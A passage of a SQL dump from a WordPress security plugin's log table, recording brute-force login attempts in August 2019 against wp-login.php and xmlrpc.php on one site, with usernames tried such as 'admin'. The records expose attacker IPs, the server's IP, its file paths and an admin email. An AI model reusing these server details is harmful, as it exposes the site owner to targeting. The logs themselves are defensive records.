empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"159.89.53.174\";s:11:\"REMOTE_PORT\";s:5:\"33020\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWNmJ3xaD7qVX4VJuZ-J0AAAABA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566795303.7811\";s:12:\"REQUEST_TIME\";s:10:\"1566795303\";}}','notice','2019-08-26 04:55:05','2019-08-26 04:55:04',17684288,19175552,'https://bintara.com.my/wp-login.php',1,0,'159.89.53.174'),(23040,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"14.192.49.47\";s:11:\"REMOTE_PORT\";s:5:\"48054\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWNn3XxaD7qVX4VJuZ-K4wAAAAI\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566795741.6109\";s:12:\"REQUEST_TIME\";s:10:\"1566795741\";}}','notice','2019-08-26 05:02:23','2019-08-26 05:02:21',17684976,19175240,'https://bintara.com.my/wp-login.php',1,0,'14.192.49.47'),(23041,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"23.95.50.21\";s:11:\"REMOTE_PORT\";s:5:\"49267\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWNpBXxaD7qVX4VJuZ-L0gAAABI\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1566796037.545\";s:12:\"REQUEST_TIME\";s:10:\"1566796037\";}}','notice','2019-08-26 05:07:19','2019-08-26 05:07:17',17683024,19174304,'https://bintara.com.my/wp-login.php',1,0,'23.95.50.21'),(23042,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"89\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"188.166.246.69\";s:11:\"REMOTE_PORT\";s:5:\"50482\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWNp-7oUwst7QvA2tJFclAAAAUA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1566796287.882\";s:12:\"REQUEST_TIME\";s:10:\"1566796287\";}}','notice','2019-08-26 05:11:29','2019-08-26 05:11:28',17683856,19174448,'https://bintara.com.my/wp-login.php',1,0,'188.166.246.69'),(23043,0,'brute_force','invalid-login::username-[login]','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:7:\"[login]\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"475\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"188.166.246.69\";s:11:\"REMOTE_PORT\";s:5:\"50668\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWNqArLuw7edOKpgf7BxXQAAAJE\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566796290.1235\";s:12:\"REQUEST_TIME\";s:10:\"1566796290\";}}','notice','2019-08-26 05:11:31','2019-08-26 05:11:30',18200320,19500128,'https://bintara.com.my/xmlrpc.php',1,0,'188.166.246.69'),(23044,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"202.6.141.211\";s:11:\"REMOTE_PORT\";s:5:\"37026\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWNq2XxaD7qVX4VJuZ-NiAAAAAI\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566796505.1503\";s:12:\"REQUEST_TIME\";s:10:\"1566796505\";}}','notice','2019-08-26 05:15:06','2019-08-26 05:15:05',17683944,19174184,'https://bintara.com.my/wp-login.php',1,0,'202.6.141.211'),(23045,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"202.6.141.211\";s:11:\"REMOTE_PORT\";s:5:\"37305\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWNq23xaD7qVX4VJuZ-NjAAAAAc\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566796507.7127\";s:12:\"REQUEST_TIME\";s:10:\"1566796507\";}}','notice','2019-08-26 05:15:09','2019-08-26 05:15:08',18199672,19496856,'https://bintara.com.my/xmlrpc.php',1,0,'202.6.141.211'),(23046,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"162.241.211.155\";s:11:\"REMOTE_PORT\";s:5:\"34384\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWNr6nxaD7qVX4VJuZ-OKgAAAAc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566796778.5317\";s:12:\"REQUEST_TIME\";s:10:\"1566796778\";}}','notice','2019-08-26 05:19:40','2019-08-26 05:19:39',17684392,19175760,'https://bintara.com.my/wp-login.php',1,0,'162.241.211.155'),(23047,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:15:\"162.241.211.155\";s:11:\"REMOTE_PORT\";s:5:\"34982\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XWNr7jzAXRCh@i15RK0uxAAAAMY\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1566796782.3334\";s:12:\"REQUEST_TIME\";s:10:\"1566796782\";}}','notice','2019-08-26 05:19:44','2019-08-26 05:19:43',18200184,19498744,'https://bintara.com.my/xmlrpc.php',1,0,'162.241.211.155'),(23048,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is 